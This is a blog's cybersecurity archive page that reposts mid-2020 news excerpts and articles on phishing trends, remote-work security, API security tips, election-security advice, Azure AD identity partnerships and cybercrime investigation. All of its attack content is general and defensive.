Category Archives: Cybersecurity

Enterprise mobile phishing increased by 37% in Q1 2020

There was a 37 percent increase worldwide in enterprise mobile phishing encounter rate between the fourth quarter of 2019 and the first quarter of 2020, according to Lookout. The cost of enterprise mobile phishing The report also shows that unmitigated mobile phishing threats could cost organizations with 10,000 mobile devices as much as $35 million per incident, and up to $150 million for organizations with 50,000 mobile devices. “Smartphones and tablets are trusted devices that … More

The post Enterprise mobile phishing increased by 37% in Q1 2020 appeared first on Help Net Security.

Zoom to offer end-to-end encryption only to paying customers

As Zoom continues on its path to bring end-to-end encryption (E2EE) to users, the big news is that only paid users will have access to the option. “Free users for sure we don’t want to give that because we also want to work together with FBI, with local law enforcement in case some people use Zoom for a bad purpose,” Zoom CEO Eric Yuan said on a company earnings call on Tuesday. Zoom encryption and … More

The post Zoom to offer end-to-end encryption only to paying customers appeared first on Help Net Security.

Office 365 users: Beware of fake company emails delivering a new VPN configuration

Phishers are impersonating companies’ IT support team and sending fake VPN configuration change notifications in the hopes that remote employees may be tricked into providing their Office 365 login credentials. Yet another Office 365 phishing campaign “The sender email address is spoofed to impersonate the domain of the targets’ respective organizations. The link provided in the email allegedly directs to a new VPN configuration for home access. Though the link appears to be related to … More

The post Office 365 users: Beware of fake company emails delivering a new VPN configuration appeared first on Help Net Security.

Cooking up secure code: A foolproof recipe for open source

The use of open source code in modern software has become nearly ubiquitous. It makes perfect sense: facing ever-increasing pressures to accelerate the rate at which new applications are delivered, developers value the ready-made aspect of open source components which they can plug in where needed, rather than building a feature from the ground up. Indeed, this practice has become so common that today the average application is composed mostly of open source libraries, with … More

The post Cooking up secure code: A foolproof recipe for open source appeared first on Help Net Security.

Researchers develop IoT security and privacy label

When hungry consumers want to know how many calories are in a bag of chips, they can check the nutrition label on the bag. When those same consumers want to check the security and privacy practices of a new IoT device, they aren’t able to find even the most basic facts. Not yet, at least. The solution A team of researchers in Carnegie Mellon University’s CyLab have developed a prototype IoT security and privacy “nutrition … More

The post Researchers develop IoT security and privacy label appeared first on Help Net Security.

Increased attacks and the power of a fully staffed cybersecurity team

The cybersecurity landscape is constantly evolving, and even more so during this time of disruption. According to ISACA’s survey, most respondents believe that their enterprise will be hit by a cyberattack soon – with 53 percent believing it is likely they will experience one in the next 12 months. Cyberattacks continuing to increase The survey found cyberattacks are also continuing to increase, with 32 percent of respondents reporting an increase in the number of attacks … More

The post Increased attacks and the power of a fully staffed cybersecurity team appeared first on Help Net Security.

Cybercriminals exposed 5 billion records in 2019, costing U.S. organizations over $1.2 trillion

Cybercriminals exposed over 5 billion records in 2019, costing over $1.2 trillion to U.S. organizations, according to ForgeRock. Coupled with breaches in 2018 costing over $654 billion, breaches over the last two years have cost U.S. organizations over $1.8 trillion. Healthcare: The most targeted industry Healthcare emerged as the most targeted industry in 2019, accounting for 382 breaches and costing over $2.45B, an increase from 164 incidents costing over $633 million in 2018. Despite healthcare … More

The post Cybercriminals exposed 5 billion records in 2019, costing U.S. organizations over $1.2 trillion appeared first on Help Net Security.

The “return” of fraudulent wire transfers

Ransomware gangs targeting businesses are currently getting more public attention, but scammers trying to trick employees into performing fraudulent wire transfers are once again ramping up their efforts, US-headquartered law firm BakerHostetler has warned. BEC scams and fraudulent wire transfers The same tactics have been employed by BEC scammers for years, but businesses of all sizes continue to fall for them. The scam is usually discovered when the accounting department of a company starts seeing … More

The post The “return” of fraudulent wire transfers appeared first on Help Net Security.

5G adoption, security and worldwide market trends

With 5G adoption ramping up all over the world, we sat down with Chris Pearson, President of 5G Americas, to learn more about the current 5G landscape. 5G Americas is an industry trade organization composed of leading telecommunications service providers and manufacturers like Samsung, AT&T, Intel, Ericsson, Qualcomm and T-Mobile. What’s your take on the current global progress towards 5G? Despite the COVID-19 crisis, 5G continues to progress at a robust pace in terms of … More

The post 5G adoption, security and worldwide market trends appeared first on Help Net Security.

Product showcase: Cloudbric Remote Access

Secure remote working is no longer just a buzzword within the cybersecurity realm – it’s become an integral part of the everyday language for all businesses in the COVID-19 era. Suddenly having a sizable number of employees working remotely presents a new challenge for those companies whose systems are not originally designed for remote access. And for many businesses and organizations, the rapid transition of the global workforce working from home means setting up their … More

The post Product showcase: Cloudbric Remote Access appeared first on Help Net Security.

How do industry verticals shape IAM priorities?

IAM priorities differ by industry vertical, and a one-size-fits-all approach to IAM doesn’t work when every industry and business within that industry is unique, according to LastPass and Vanson Bourne. Each industry vertical has unique business needs, and as a result has different areas of focus when it comes to their IAM program. Finance focused on reducing risk, while integrating IAM infrastructure Financial service organizations deal with higher stakes than most verticals, which inevitably impacts … More

The post How do industry verticals shape IAM priorities? appeared first on Help Net Security.

Most companies suffered a cloud data breach in the past 18 months

Nearly 80% of the companies had experienced at least one cloud data breach in the past 18 months, and 43% reported 10 or more breaches, a new Ermetic survey reveals. According to the 300 CISOs that participated in the survey, security misconfiguration (67%), lack of adequate visibility into access settings and activities (64%) and identity and access management (IAM) permission errors (61%) were their top concerns associated with cloud production environments. Meanwhile, 80% reported they … More

The post Most companies suffered a cloud data breach in the past 18 months appeared first on Help Net Security.

Tasks associated with SOX compliance continue to be significant

Only 46 percent of audit teams have been utilizing advanced technologies to optimize SOX compliance activities, a decrease from the previous year’s Protiviti survey findings. SOX compliance challenges The longstanding challenges associated with compliance with the Sarbanes-Oxley Act, such as the cost of compliance and reliance on time-consuming manual tasks, are being exacerbated by the COVID-19 pandemic, as finance and audit teams are required to perform audit tasks remotely. “The tasks associated with SOX compliance … More

The post Tasks associated with SOX compliance continue to be significant appeared first on Help Net Security.

Lean into zero trust to ensure security in times of agility

Bad actors are rapidly mounting phishing campaigns, setting up malicious websites and sending malicious attachments to take full advantage of the pandemic and users’ need for information, their fears and other emotions. More often than not, the goal is the compromise of login credentials. Many organizations grant more trust to users on the intranet versus users on the internet. Employees working from home – while unknowingly browsing potentially malicious websites and clicking on doctored COVID-19 … More

The post Lean into zero trust to ensure security in times of agility appeared first on Help Net Security.

How to successfully operationalize your micro-segmentation solution

Introducing a new security model into your existing infrastructure can be challenging. The task becomes even more daunting when starting with a new host-based or micro-segmentation solution. If you’ve decided on a host-based approach to segmentation, I’d like to share, based on personal experience, some advice and best practices on using this type of solution in your organization. Discovery The business case that drove your organization to adopt a host-based segmentation solution will serve as … More

The post How to successfully operationalize your micro-segmentation solution appeared first on Help Net Security.

Not all IT budgets are being cut, some are increasing

At a high level—and contrary to conventional wisdom – not all IT budgets are being cut. Even with the economic challenges that COVID-19 has posed for businesses, almost 38 percent of enterprises are keeping their IT budgets unchanged (flat) or actually increasing them. Yellowbrick Data received responses from more than 1,000 enterprise IT managers and executives, uncovering their infrastructure priorities during this era of economic uncertainty and disruption. “The survey brought to light some trends … More

The post Not all IT budgets are being cut, some are increasing appeared first on Help Net Security.

Security remains a major concern for enterprise IoT integration

Most companies see strong business drivers to adopt IoT as part of a broader digital transformation process. Improved efficiency and productivity, improved product/service quality, and improved customer retention and experience ranked highest as objectives. Implementation concerns, particularly around security, remain, Syniverse reveals. The study was conducted across 200 enterprise executives in North America and Europe in several key vertical industries already using or in the process of deploying IoT, including financial services, retail, manufacturing, healthcare … More

The post Security remains a major concern for enterprise IoT integration appeared first on Help Net Security.

How businesses are adapting IT strategies to meet the demands of today

Businesses are are adapting IT strategies, reprioritizing cloud adoption and automated database monitoring due to the effects of a global lockdown, remote working and a focus on business continuity, according to Redgate. The report, which surveyed nearly 1,000 respondents in April 2020, reveals that while performance monitoring and backups remain the most common responsibilities for database professionals, managing security and user permissions have leapt to third and fourth place, respectively. However, there seems to be … More

The post How businesses are adapting IT strategies to meet the demands of today appeared first on Help Net Security.

When SOCs never stop: How to fill the intelligence gaps in security

Demand for security analysts and security operations centre experts is high – so high that Frost and Sullivan found only two percent unemployment in the sector and that demand continues outstrip the supply of newly skilled professionals. (ISC)² suggests that the number of skilled professionals will have to grow from 2.8 million worldwide to 4.07 million to close the skills gap. All these roles will require the right skills and the right data. Alongside filling … More

The post When SOCs never stop: How to fill the intelligence gaps in security appeared first on Help Net Security.

The challenge of updating locally cached credentials

As organizations work to ensure remote workforce productivity, the issue of cached credentials will inevitably appear, causing a problem for the impacted user, and the IT service desk. It’s no secret that some material portion of nearly every workforce is functioning remotely. You’ve spent the last few months scurrying to establish remote connectivity, cloud-based productivity, and some form of encompassing security – all to allow your remote employees to get their job done while meeting … More

The post The challenge of updating locally cached credentials appeared first on Help Net Security.

Agile security helps software teams deliver quicker and better software

Agile adoption improves key capabilities needed to respond to current business challenges, especially those resulting from the pandemic, according to Digital.ai. With 60 percent of survey respondents saying Agile has helped increase speed to market, 41 percent agreeing they are better able to manage distributed teams, and 58 percent saying they have improved team productivity it is clear these practices are invaluable during these challenging times. “Our all-in move to the cloud in recent years … More

The post Agile security helps software teams deliver quicker and better software appeared first on Help Net Security.

Factors driving API growth in industry

This is third in a series of articles that introduces and explains application programming interfaces (API) security threats, challenges, and solutions for participants in software development, operations, and protection. Explosion of APIs The API explosion is also driven by several business-oriented factors. First, enterprises are moving away from large monolithic applications that are updated annually at best. Instead, legacy and new applications are being broken into small, independently functional components, often rolled out as container-based … More

The post Factors driving API growth in industry appeared first on Help Net Security.

41% of organizations have not taken any steps to expand secure access for the remote workforce

Currently, organizations are struggling to adjust to the new normal amidst the COVID-19 pandemic, a Bitglass survey reveals. 41% have not taken any steps to expand secure access for the remote workforce, and 50% are citing proper equipment as the biggest impediment to doing so. Consequently, 65% of organizations now enable personal devices to access managed applications. Remote work and secure access concerns When asked what their organizations are primarily concerned with securing while employees … More

The post 41% of organizations have not taken any steps to expand secure access for the remote workforce appeared first on Help Net Security.

API Security and Hackers: What’s the Need?

API Security – There is a considerable demand for data-centric projects, that is why companies have quickly opened their data to their ecosystem through REST or SOAP APIs.

APIs work as doors for a company – closely guarding data of an organization. However, there are some challenges created: how do we hold the doors open to the world while simultaneously sealing them off from hackers?

Here are the simple tips for API security, let’s have a look! 

Authentication

Don’t communicate with strangers. To increase the complexity of hacking your device, always get to know who is calling your APIs, by using a simple access authentication (user/password) or an API key (asymmetric key).

Encryption 

Just be cryptic. For internal or external correspondence nothing should be in the open.

You and your partners can cipher all TLS (the successor to SSL) transfers, be it one-way encryption (also called standard one-way TLS) or even better, shared encryption (two-way TLS).

Using the new versions of TLS to block the use of weaker cipher suites.

Monitoring: Audit, Log, and Version 

In case of an error, you need to be ready to troubleshoot: audit and log relevant information on the server. Also, keep that history as long as it is reasonable in terms of capacity for your servers in production. In case of any accidents, you can convert your logs into debugging tools. Follow-up dashboards are also highly recommended resources for monitoring your API use.

Do not forget to add the version to all APIs, ideally in the API direction, to give several APIs with different versions working concurrently, and to be able to delete and depreciate one version over another.

Call Security Experts

It is better to use ICAP (Internet Content Adaptation Protocol) servers or excellent Antivirus systems to protect the data of your company. 

Share as Little as Possible 

For API security, it’s okay to be paranoid and show very little information, particularly in error messages. Limit content and email subjects to predefined messages that are non-customizable. Since you can send locations to IP addresses, keep them for yourself. To limit access to your accounts, use IP Whitelist and IP Blacklist where possible. You can also check your ip address by simply searching what is my ip and you will get the details. Limit the number of administrators, divide access into diverse roles, and hide sensitive information in all your interfaces. 

OAuth & OpenID Connect 

Delegate all responsibilities. A good manager takes accountability, and a fantastic API does so too. The authorization and/or authentication of your APIs should be delegated.

OAuth is a magical mechanism which prevents you from having to remember 10,000 passwords. Instead of creating an account on a website, you can connect via credentials from another provider, such as Facebook or Google. This works the same way for APIs: the API provider depends on a third-party server to handle permissions. The user does not supply their credentials but then gives the third-party server a token. This protects the user because they don’t reveal their passwords, and the provider of the API doesn’t need to worry about protecting data about the authorization, because it only collects tokens.

OAuth is a delegation protocol widely used to forward authorizations. You can add an identity layer on top of it to protect your APIs even further and add authentication: this is the Open I d Connect standard which extends OAuth 2.0 with ID tokens.

System Protection with Throttling and Quotas 

Keep a Control. To protect your backend network bandwidth according to the capability of your servers, you can restrict access to your device to a limited number of messages per second.

You can also limit access by the API and the user (or application) to make sure that no one, in particular, can misuse the program or any API.

Throttling thresholds and quotas – if well defined – are essential to avoid attacks from different sources from overwhelming the network with numerous requests (DDOS-Distributed Denial of Service Attack).

OWASP top 10

Avoid wasps. The top 10 of the OWASP (Open Web Application Security Project) is a list of the ten worst vulnerabilities, measured by their exploitability and effect. In addition to the above, make sure that you have checked all of the bugs in OWASP to check the program.

Data Validation 

Be picky and refuse surprise presents, especially when they’re massive. You should verify that your server is accepting anything. Be vigilant to reject any content that is added, data that is too high, and also test the information that customers give you. Use XML or JSON schema validation to verify whether your restrictions are what they should be (integer, string …) to avoid all kinds of XML blast and SOL injection. 

Infrastructure 

Stay up-to-date. To be stable and still benefit from the latest security updates, a good API should rely on a good security network, infrastructure and up-to-date applications (servers, load balancers).

API Firewalling 

Create a wall: Building of a wall will solve all the immigration issues for some citizens. That is the case, at least for APIs! The protection of your API should be divided into two levels:

  • DMZ is the first level, with an API firewall to perform simple protection measures, including checking message size, SQL injections, and any HTTP layer-based protection that blocks intruders early. The message is then forwarded to the second sheet.
  • The second level is LAN, with advanced data information protection mechanisms.

Set a Budget for Security Testing 

Security monitoring takes time and resources, and the investment needs to be made by the businesses. Although new functionality drives growth, security testing should be allocated about 5 percent to 10 percent of the budget. Use of APIs is growing and encouraging companies to create more diverse applications. Nonetheless, as they exploit these resources, companies need to be mindful of and close the possible security holes.

About the author: Waqas Baig

Waqas Baig is a Tech Writer having experience of 8 years in journalism, reporting and editing. In his spare time, he reads and writes about tech products including gadgets, smart watches, home security products and others. If you have story ideas, feel free to share here waqasbaigblog@gmail.com

Pierluigi Paganini

(SecurityAffairs – APT, hacking)

The post API Security and Hackers: What’s the Need? appeared first on Security Affairs.

People Are The Strongest Link

Here’s a little preview of what you’ll find in Episode 6 of the Security Stories podcast.

If you’re looking for behind the scenes tales from some of the leading figures in cybersecurity, then you’re in the right place. If you’re looking for anecdotes from significant security events in the past, then you’re also in the right place. 

If you’re looking for advice on how to create the perfect TicToc video, well, you’re in the wrong place, but do stick around and see if you find anything interesting.

Brian HonanOn today’s show we have a great interview with an altruistic Irishman who wears cool glasses and has a nice variety of white hats.

Nope, it’s not Bono, but we are lucky enough to have Brian Honan as our guest on this episode.

Brian is an internationally recognised expert on cybersecurity and data protection, but if you were to ask his young son what he did, the answer would be, ‘Dad catches hackers”.

In 2008 Brian founded Ireland’s first Computer Emergency Response Team. He’s also an adviser for Europol’s European Cybercrime Centre, and he runs his own independent security consultancy, BH Consulting, with a team based across the globe.

We cover a wide variety of topics during the interview, including the genesis of the Irish Emergency Response Team, running a company and managing a team, and why the cybersecurity industry needs more accountability.

A key part of our discussion is about people.  For many years, people have been deemed “the weakest link” when it comes to security.  Brian has an interesting take on why this isn’t the case. It’s really worth a listen.

Also in this episode is our regular “On This Day” feature. This is when my co-host Ben and I jump into the DeLorean and visit a significant cybersecurity event in the past.

This time we’re travelling back to the year 2000 which is when the “ILOVEYOU” worm or the “Love Bug”, or indeed the “Love letter for you” cyber attack ended up infecting over 10 million personal Windows computers.   Discover the unique story behind this attack, and the additional part of the story, which happened only a few days ago.

You can listen to this podcast on Apple Podcasts, Spotify, Google Podcasts, or wherever you normally get your podcasts from! You can also listen right here and now:

Listen to previous episodes of the Security Stories podcast right here

The post People Are The Strongest Link appeared first on Cisco Blogs.

How to protect your business from COVID-19-themed vishing attacks

Cybercriminals have been using the COVID-19 pandemic as a central theme in all kinds of crisis-related email phishing campaigns. But because of the dramatic rise of the number of at-home workers, one method that has become increasingly common over the past few months are vishing attacks, i.e., phishing campaigns executed via phone calls. Rising success rates are the reason why vishing has become more common, and there are several factors driving this trend: People are … More

The post How to protect your business from COVID-19-themed vishing attacks appeared first on Help Net Security.

Despite lower number of vulnerability disclosures, security teams have their work cut out for them

The number of vulnerabilities disclosed in Q1 2020 has decreased by 19.8% compared to Q1 2019, making this likely the only true dip observed within the last 10 years, Risk Based Security reveals. Vulnerabilities of interest disclosed in Q1 2020 Vulnerabilities disclosed in Q1 2020: What happened? Many factors have been identified as potential contributors to this decline, including the COVID-19 pandemic, though its precise impact may not be known for another year. “Although the … More

The post Despite lower number of vulnerability disclosures, security teams have their work cut out for them appeared first on Help Net Security.

Why is SDP the most effective architecture for zero trust strategy adoption?

Software Defined Perimeter (SDP) is the most effective architecture for adopting a zero trust strategy, an approach that is being heralded as the breakthrough technology for preventing large-scale breaches, according to the Cloud Security Alliance. “Most of the existing zero trust security measures are applied as authentication and sometimes authorization, based on policy after the termination of Transport Layer Security (TLS) certificates,” said Nya Alison Murray, senior ICT architect and co-lead author of the report. … More

The post Why is SDP the most effective architecture for zero trust strategy adoption? appeared first on Help Net Security.

Employees abandoning security when working remotely

48% of employees are less likely to follow safe data practices when working from home, a report from Tessian reveals. The global shift to remote working poses new security challenges for businesses and traditional security solutions are failing to curb the problem of the insider threat and accidental data loss. Remote work compounds insider threats While 91% of IT leaders trust their staff to follow best security practices when working remotely, 52% of employees believe … More

The post Employees abandoning security when working remotely appeared first on Help Net Security.

Global WAN optimization market forecast to reach $1.4 billion by 2025

The WAN optimization market is expected to grow from $1,047.1 million in 2020 to $1,446.2 million by 2025, at a Compound Annual Growth Rate (CAGR) of 6.7% during the forecast period of 2020-2025, according to ResearchAndMarkets. Most cloud-based applications need good bandwidth and low latency for effective utilization. In large-scale WAN deployments, latency, bandwidth constraints, and packet losses are inevitable. WAN optimization enables enterprises and service providers to save money and reduce costs with reduced … More

The post Global WAN optimization market forecast to reach $1.4 billion by 2025 appeared first on Help Net Security.

2020 Voters: What You Need to Know About Election Security

Voters across the country are preparing to cast their ballot for the all-important 2020 U.S. presidential elections. Whether you’re a new voter eager for your voice to be heard or a parent looking to guide your family members on exercising their right to vote, consumers can be certain about one thing: election security should be top-of-mind for everyone as Election Day creeps closer. In addition to researching the presidential candidates and deciding who to support, consumers should also educate themselves on how to vote safely and securely.    

Heads Up, First-Time Voters

As a young or first-time voter, you are probably eager to have your voice finally heard. However, you should also be on high alert for digital disinformation campaigns. These scams seek to suppress or disrupt the voting process by setting up bogus websites with official-sounding domains and related email addresses. From there, hackers could use those bogus email addresses to send mass email blasts intended to feed unsuspecting voter email recipients false information on when, where, and how to vote.   

According to recent McAfee survey results, the majority of election administration websites for “tossup” states lacked the official U.S. government .GOV website validation and HTTPS website security measures, which prevent hackers from launching fake websites disguised as legitimate county government sites. It is critical that before Americans cast that incredibly important ballot, they confirm the site they are visiting is a .GOV website and that HTTPS security protection is in place.  

Help Protect Your Family’s Vote

Whether it’s who you’re voting for or what you think of party policy, it’s incredibly important that every voice is heard in 2020. As people across the country make their decision, you must discuss the implications of digital disinformation and illegitimate voting websites with your family. Failing to discuss these attacks with new or young voters could mean the difference between whether or not their voice is heard in the 2020 election. Consumers must take action to ensure they are staying informed on possible hacks like this and sharing it with their loved ones to ensure no voices are left unheard this year.  

How to Stay Protected

Whether it’s your first or fifteenth time heading to the polls, we must all take action to ensure we’re staying informed on possible hacks, minimizing risk and not leaving this vote to chance. As you or your loved ones prepare to cast your ballots, consider these tips to help ensure that your vote is protected:   

Look out for suspicious emails

Carefully scrutinize all election-related emails. An attacker seeking to misinform consumers can use phishing techniques to accomplish their objective. Beware of election emails from non-.gov addresses such as .com, .net, .org, or .us, particularly any emails sent in the final days before Election Day. 

 Question conflicting instructions

Question any voting instructions that appear to conflict with other guidance you’ve received from traditional sources such as the U.S. Postal Service, the primary channel state and local governments use to send out voting information.  

Refer to your official State website

When in doubt, visit your state’s elections website to receive general election information on voter registration and contact information for your county’s election officials. Contact the local county officials to confirm any election instructions you receive via email, social media, or websites leading up to Election Day. Voters can find the official state election websites here 

Confirm local instructions locally

Call your county or city government officials directly to confirm any last-minute voting instruction changes to the regional or local Election Day procedures. 

Ask for .gov and https on websites

Ask your county officials to use .gov validation and https protection on any government websites involved in elections. The .gov in a website name validates that the U.S. government has certified that the website truly belongs to the government entity it claims. The https indicates that any information you with the government website cannot be stolen and that voters cannot be redirected to fake government sites.  

Stay Updated

To stay updated on all things McAfee and on top of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook  

The post 2020 Voters: What You Need to Know About Election Security appeared first on McAfee Blogs.

4 identity partnerships to help drive better security

At Microsoft, we are committed to driving innovation for our partnerships within the identity ecosystem. Together, we are enabling our customers, who live and work in a heterogenous world, to get secure and remote access to the apps and resources they need. In this blog, we’d like to highlight how partners can help enable secure remote access to any app, access to on-prem and legacy apps, as well as how to secure seamless access via passwordless apps. We will also touch on how you can increase security visibility and insights by leveraging Azure Active Directory (Azure AD) Identity Protection APIs.

Secure remote access to cloud apps

As organizations adopt remote work strategies in today’s environment, it’s important their workforce has access to all the applications they need. With the Azure AD app gallery, we work closely with independent software vendors (ISV) to make it easy for organizations and their employees and customers to connect to and protect the applications they use. The Azure AD app gallery consists of thousands of applications that make it easy for admins to set up single sign-on (SSO) or user provisioning for their employees and customers. You can find popular collaboration applications to work remotely such Cisco Webex, Zoom, and Workplace from Facebook or security focused applications such as Mimecast, and Jamf. And if you don’t find the application your organization needs, you can always make a nomination here.

The Azure AD Gallery

The Azure AD Gallery.

Secure hybrid access to your on-premises and legacy apps

As organizations enable their employees to work from home, maintaining remote access to all company apps, including those on-premises and legacy, from any location and any device, is key to safeguard the productivity of their workforce. Azure AD offers several integrations for securing on-premises SaaS applications like SAP NetWeaver, SAP Fiori systems, Oracle PeopleSoft and E-Business Suite, and Atlassian JIRA and Confluence through the Azure AD App Gallery. For customers who are using Akamai Enterprise Application Access (EAA), Citrix Application Delivery Controller (ADC), F5 BIG-IP Access Policy Manager (APM), or Zscaler Private Access (ZPA), Microsoft has partnerships to provide remote access securely and help extend policies and controls that allow businesses to manage and govern on-premises legacy apps from Azure AD without having to change how the apps work.

Our integration with Zscaler allows a company’s business partners, such as suppliers and vendors, to securely access legacy, on-premises applications through the Zscaler B2B portal.

Integration with Zscaler

Go passwordless with FIDO2 security keys

Passwordless methods of authentication should be part of everyone’s future. Currently, Microsoft has over 100-million active passwordless end-users across consumer and enterprise customers. These passwordless options include Windows Hello for Business, Authenticator app, and FIDO2 security keys. Why are passwords falling out of favor? For them to be effective, passwords must have several characteristics, including being unique to every site. Trying to remember them all can frustrate end-users and lead to poor password hygiene.

Since Microsoft announced the public preview of Azure AD support for FIDO2 security keys in hybrid environments earlier this year, I’ve seen more organizations, especially with regulatory requirements, start to adopt FIDO2 security keys. This is another important area where we’ve worked with many FIDO2 security key partners who are helping our customers to go passwordless smoothly.

Partner logos

Increase security visibility and insights by leveraging Azure AD Identity Protection APIs

We know from our partners that they would like to leverage insights from the Azure AD Identity Protection with their security tools such as security information event management (SIEM) or network security. The end goal is to help them leverage all the security tools they have in an integrated way. Currently, we have the Azure AD Identity Protection API in preview that our ISVs leverage. For example, RSA announced at their 2020 conference that they are now leveraging our signals to better defend their customers.

We’re looking forward to working with many partners to complete these integrations.

If you haven’t taken advantage of any of these types of solutions, I recommend you try them out today and let us know what you think. If you have product partnership ideas with Azure AD, feel free to connect with me via LinkedIn or Twitter.

The post 4 identity partnerships to help drive better security appeared first on Microsoft Security.

The Process of Investigating Cyber Crimes

Cybercrime is any criminal activity where the object as a target and/or tool is a computer or network device. Some cyber crimes directly attack computers or other devices to disable them. In others, computers are used for their purposes by cyber criminals to distribute malicious program codes, obtain illegal information, or to obtain cryptocurrency. Dividing cybercrimes into separate categories is not easy as there are many of them. That’s why students often ask professional help from a paper writing service when they need to write about cyber crimes.

Hacker attacks have long ceased to be the intellectual fun of the sophisticated IT singles. Today there are many specialists who perform various types of cyberattacks. The cyberattack itself is only a means for the achievement of a certain goal. In such a situation, economic and political goals prevail: money and power are powerful incentives for resorting to cybercrime methods. Therefore, organizations with developed online businesses that actively use electronic payment systems, network resources of political parties, movements are the first goals of cyber criminals with a different level of intelligence. The foregoing does not exclude one-time shares of individuals or just their own criminal business, which can adversely affect each of us. 

How Do Cybercriminals Commit Their Crimes?

There are four of the most common ways that cybercriminals use the Internet opportunities.

  • The first one that many people fear is the use of malware. You probably understand that there are many methods of operating critical systems, and how important it is to use various security measures, for example, set long passwords and make regular file updates. This type of attack is based on the abuse of computers, DNS servers, networks, domain and subdomain. Take into account that Windows is more vulnerable than a Linux system.
  • The second way is DDOS attacks when an attacker uses a communication network protocol to create a huge number of requests to a server or service. In this type of attack, the main goal is to disable the target.
  • The third way is a combination of social engineering and malicious code. The most famous form of this type of attack is phishing when a victim is forced to take certain actions (clicking on a link in an email, image, visiting a site, etc.), which subsequently leads to infection of the system using the first method.
  • The fourth way is illegal activity: harassment, record, and distribution of illegal content, grooming, etc. In this case, the attackers hide their traces through anonymous profiles, encrypted messages, and other similar technologies.

What Are the Steps of Cyber Crime Investigation?

In the very beginning, law enforcement officials should assess the current situation with the goal to have a clear understanding of what had happened, what illegal information was accessed by law, what solid facts can prove signs of illegal activity. Officials should have technical evidence and legal facts to have the right to collect a sufficient amount of information. Then at the next stage, a decision can be made to initiate a criminal case. Other qualified experts will investigate it using the support of qualified specialists in the sphere of computer-technical research and cybersecurity. In order for a court to pronounce a sentence on the basis of the current criminal procedure legislation, authorities should make certain steps. Check what they are:

  • Find solid evidence that the crime took place and determine when, where, and how exactly it was committed;
  • Find those who are guilty of the crime and provide solid arguments proving the guilt of one person or a group of people;
  • Define the circumstances that can prove the identity of the guilty person;
  • Determine the negative consequences of the crime that took place;
  • Find out what factors led to the crime.

Today, one can find a good private agency that will make all the above-listed steps.

Why Is the Computer-Technical Expertise a Must?

The purpose of computer-technical expertise is to determine the digital traces that can be connected with certain people. Another goal is to evaluate the conformity of these traces to a definite situation and to select significant activities in terms of forensic cases. It’s necessary to identify what traces can serve as the foundation of the investigation. A vital issue is the presentation of the results of the study so that even a specialist without solid knowledge in the IT industry has a clear understanding of the situation. These are lawyers, judges, and all the specialists who are involved in the legal proceedings. 

Generally accepted models of digital data analysis for judicial purposes:

  • The model of providing the maximum speed of digital data processing and focused on solving typical (standard) tasks;
  •  An individual approach, “thorough” and focused on rare or simply unique tasks.

The first uses professional digital equipment, specialized expert programs such as Encase, but practically does not allow taking into account an individual technique for the preparation and commission of cybercrimes. The individual approach model, on the contrary, takes into account all the individual characteristics mentioned above, since the expert selects specialized programs and the technology for the production of expertise in general, based on the informational and technological laws of a particular crime known to him/her. In general, one can say that this method allows finding rare, unusual traces in the information environment that may be used as evidence in a criminal case.

The post The Process of Investigating Cyber Crimes appeared first on .

Solving the security challenges of remote working

Unprecedented times call for unprecedented actions and the ongoing COVID-19 pandemic has caused what is likely to be the biggest shift towards remote working that the world has ever seen. But, while the technology has been around for quite some time, recent events demonstrate just how few businesses are capable of switching from an office-based setup to a remote one in a fast, secure, and non-disruptive manner. There’s a significant number of reasons why it … More

The post Solving the security challenges of remote working appeared first on Help Net Security.

Computer science student discovers privacy flaws in security and doorbell cameras

Ring, Nest, SimpliSafe and eight other manufacturers of internet-connected doorbell and security cameras have been alerted to systemic design flaws discovered by Florida Tech computer science student Blake Janes that allows a shared account that appears to have been removed to actually remain in place with continued access to the video feed. Privacy flaws in security and doorbell cameras Janes discovered the mechanism for removing user accounts does not work as intended on many camera … More

The post Computer science student discovers privacy flaws in security and doorbell cameras appeared first on Help Net Security.

External attacks on cloud accounts grew 630 percent from January to April

The McAfee report uncovers a correlation between the increased use of cloud services and collaboration tools, such as Cisco WebEx, Zoom, Microsoft Teams and Slack during the COVID-19 pandemic, along with an increase in cyber attacks targeting the cloud. There are significant and potentially long-lasting trends that include an increase in the use of cloud services, access from unmanaged devices and the rise of cloud-native threats. These trends emphasize the need for new security delivery … More

The post External attacks on cloud accounts grew 630 percent from January to April appeared first on Help Net Security.

C-suite execs often pressure IT teams to make security exceptions for them

The C-suite is the most likely group within an organization to ask for relaxed mobile security protocols (74%) – despite also being highly targeted by malicious cyberattacks, according to MobileIron. The study combined research from 300 enterprise IT decision makers across Benelux, France, Germany, the U.K. and the U.S., as well as 50 C-level executives from both the U.K. and the U.S. The study revealed that C-level executives feel frustrated by mobile security protocols and … More

The post C-suite execs often pressure IT teams to make security exceptions for them appeared first on Help Net Security.

Operators rethinking security while making rapid progress toward 5G

Mobile service providers say they are making substantial progress toward ushering in a new generation of 5G networks that will enable ultra-high-speed mobile connectivity and a wide variety of new applications and smart infrastructure use cases. Progress includes steady work toward virtualizing core network functions and a reexamination of the security investments they will need to protect their networks and customers. COVID-19 is not expected to significantly delay the progress of 5G deployments, according to … More

The post Operators rethinking security while making rapid progress toward 5G appeared first on Help Net Security.

What’s trending on the underground market?

Trust has eroded among criminal interactions, causing a switch to e-commerce platforms and communication using Discord, which both increase user anonymization, Trend Micro reveals. Popular underground goods and services The report reveals that determined efforts by law enforcement appear to be having an impact on the cybercrime underground. Several forums have been taken down by global police entities, and remaining forums experience persistent DDoS attacks and log-in problems impacting their usefulness. Loss of trust led … More

The post What’s trending on the underground market? appeared first on Help Net Security.

How to Secure Your Personal Data While Online?

Even if you have absolutely nothing to hide, you still have to protect the privacy of your data. Increasingly, our whole life fits in a series of short data that is sold on the internet. Think carefully before allowing any application to access your contact list or friend profiles. So, monitoring your online activity is important to protect not only information about yourself but also your own identity and the security of your loved ones.

For example, there is a program that will help protect your identity on the internet, IDShield. Here, you can read everything you need to know about IDShield in 2020. Note that many antiviruses, apart from protecting against malware, offer their own services for password security, tracking privacy settings, etc. If you are really worried about your personal data safety, then there is a reason to purchase such software.

Where to Start?

How to protect your data? A large number of laptops, tablets, smartphone owners are positive that they give their gear security protection by installing an antivirus program. But does the antivirus give full protection against hackers, or should you rely only on your own caution by minimizing the spread of personal information on the internet? Here, we will discuss how your personal data can leak and what to do to prevent it.

